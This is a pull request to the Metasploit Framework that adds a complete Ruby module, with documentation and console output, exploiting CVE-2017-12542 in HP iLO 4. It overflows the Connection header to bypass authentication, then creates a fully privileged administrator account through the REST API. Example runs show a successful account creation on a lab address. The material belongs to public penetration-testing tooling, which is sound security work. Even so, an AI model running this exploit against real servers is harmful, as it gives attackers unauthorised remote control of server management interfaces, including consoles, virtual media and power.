### PR TITLE
Add module for HP iLO CVE-2017-12542 authentication bypass

### DIFF
--- a/documentation/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.md
+++ b/documentation/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.md
@@ -13,11 +13,11 @@ This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, whi
 
   **USERNAME**
 
-  The username of the new administrator account. Defaults to msf_user
+  The username of the new administrator account. Defaults to a random string.
 
   **PASSWORD**
 
-  The password of the new administrator account. Defaults to msf_password
+  The password of the new administrator account. Defaults to a random string.
 
 ## Scenarios
 

--- a/documentation/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.md
+++ b/documentation/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.md
@@ -1,0 +1,42 @@
+This module exploits the CVE-2017-12542 for authentication bypass on HP iLO, which is 100% stable when exploited this way, to create an arbitrary administrator account.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use auxiliary/admin/hp/hp_ilo_create_admin_account`
+3. Set `RHOST`
+4. run `check` to check if remote host is vulnerable (module tries to list accounts using the REST API)
+5. Set `USERNAME` and `PASSWORD` to specify a new administrator account credentials
+6. run `run` to actually create the account on the iLO
+
+## Options
+
+  **USERNAME**
+
+  The username of the new administrator account. Defaults to msf_user
+
+  **PASSWORD**
+
+  The password of the new administrator account. Defaults to msf_password
+
+## Scenarios
+
+### New administrator account creation
+
+```
+msf > use auxiliary/admin/hp/hp_ilo_create_admin_account 
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set RHOST 192.168.42.78
+RHOST => 192.168.42.78
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > check
+[+] 192.168.42.78:443 The target is vulnerable.
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set USERNAME test_user
+USERNAME => test_user
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set PASSWORD test_password
+PASSWORD => test_password
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run
+
+[*] Trying to create account test_user...
+[+] Account test_user/test_password created successfully.
+[*] Auxiliary module execution completed
+msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
+```

--- a/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb
+++ b/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
+      'Description'    => %q{
+        This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
+        overflow in the Connection HTTP header handling by the web server.
+        Exploiting this vulnerability gives full access to the Rest API, allowing arbitrary
+        accounts creation.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2017-12542' ],
+          [ 'BID', '100467' ],
+          [ 'URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us' ],
+          [ 'URL', 'https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html' ]
+        ],
+      'Author'         =>
+        [
+          'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Aug 24 2017",
+      'DefaultOptions' => { 'SSL' => true }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'Username for the new account', 'msf_user']),
+        OptString.new('PASSWORD', [true, 'Password for the new account', 'msf_p4ssw0rd'])
+      ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+                             'method' => 'GET',
+                             'uri'    => '/rest/v1/AccountService/Accounts',
+                             'headers' => {
+                               "Connection" => Rex::Text.rand_text_alphanumeric(29)
+                             }
+                             })
+    rescue
+      return Exploit::CheckCode::Safe
+    end
+
+    if res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def run
+    print_status("Trying to create account #{datastore["USERNAME"]}...")
+
+    data = {}
+    data["UserName"] = datastore["USERNAME"]
+    data["Password"] = datastore["PASSWORD"]
+    data["Oem"] = {}
+    data["Oem"]["Hp"] = {}
+    data["Oem"]["Hp"]["LoginName"] = datastore["USERNAME"]
+    data["Oem"]["Hp"]["Privileges"] = {}
+    data["Oem"]["Hp"]["Privileges"]["LoginPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["RemoteConsolePriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["UserConfigPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["VirtualMediaPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["VirtualPowerAndResetPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["iLOConfigPriv"] = true
+
+    res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri'    => '/rest/v1/AccountService/Accounts',
+                             'ctype'  => 'application/json',
+                             'headers' => {
+                               "Connection" => Rex::Text.rand_text_alphanumeric(29)
+                             },
+                             'data' => data.to_json()
+                           })
+
+    unless res
+      print_error("Unknown error while creating the user #{res.code}.")
+      return
+    end
+
+    if res.body =~ /InvalidPasswordLength/
+      print_error("Password #{datastore["PASSWORD"]} is too short.")
+      return
+    elsif res.body =~ /UserAlreadyExist/
+      print_error("The user #{datastore["USERNAME"]} already exists.")
+      return
+    end
+
+    if res.code == 201
+      print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.")
+    else
+      print_error("Unknown error while creating the user #{res.code}.")
+    end
+  end
+end
+

--- a/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb
+++ b/modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
       'Description'    => %q{
         This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
         overflow in the Connection HTTP header handling by the web server.
-        Exploiting this vulnerability gives full access to the Rest API, allowing arbitrary
+        Exploiting this vulnerability gives full access to the REST API, allowing arbitrary
         accounts creation.
       },
       'References'     =>
@@ -34,8 +34,8 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(443),
-        OptString.new('USERNAME', [true, 'Username for the new account', 'msf_user']),
-        OptString.new('PASSWORD', [true, 'Password for the new account', 'msf_p4ssw0rd'])
+        OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
+        OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
       ])
   end
 


### PR DESCRIPTION
Add an auxiliary module to insert a new administration account in vulnerable HP iLO4 web interfaces. The module exploits the CVE-2017-12542 for authentication bypass, which is 100% stable when exploited this way.

## Verification

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/hp/hp_ilo_create_admin_account`
- [x] Set `RHOST`
- [x] run `check` to check if remote host is vulnerable (module tries to list accounts using the REST API)
- [x] Set `USERNAME` and `PASSWORD` to specify a new administrator account credentials
- [x] run `run` to actually create the account on the iLO

## Example output
```
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account 
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > info

       Name: HP iLO 4 <= 2.50 Authentication Bypass Administrator Account Creation
     Module: auxiliary/admin/hp/hp_ilo_create_admin_account
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-08-24

Provided by:
  Fabien Perigaud <fabien.perigaud@synacktiv[dot]com>

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD  msf_p4ssw0rd     yes       Password for the new account
  Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                      yes       The target address
  RPORT     443              yes       The target port (TCP)
  SSL       true             no        Negotiate SSL/TLS for outgoing connections
  USERNAME  msf_user         yes       Username for the new account
  VHOST                      no        HTTP server virtual host

Description:
  This module exploits an authentication bypass in HP iLO 4 <= 2.50, 
  triggered by a buffer overflow in the Connection HTTP header 
  handling by the web server. Exploiting this vulnerability gives full 
  access to the Rest API, allowing arbitrary accounts creation.

References:
  https://cvedetails.com/cve/CVE-2017-12542/
  http://www.securityfocus.com/bid/100467
  https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us
  https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html

msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set RHOST 192.168.42.78
RHOST => 192.168.42.78
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set USERNAME test_user
USERNAME => test_user
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set PASSWORD test_password
PASSWORD => test_password
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > check
[+] 192.168.42.78:443 The target is vulnerable.
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run

[*] Trying to create account test_user...
[+] Account test_user/test_password created successfully.
[*] Auxiliary module execution completed
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > 
```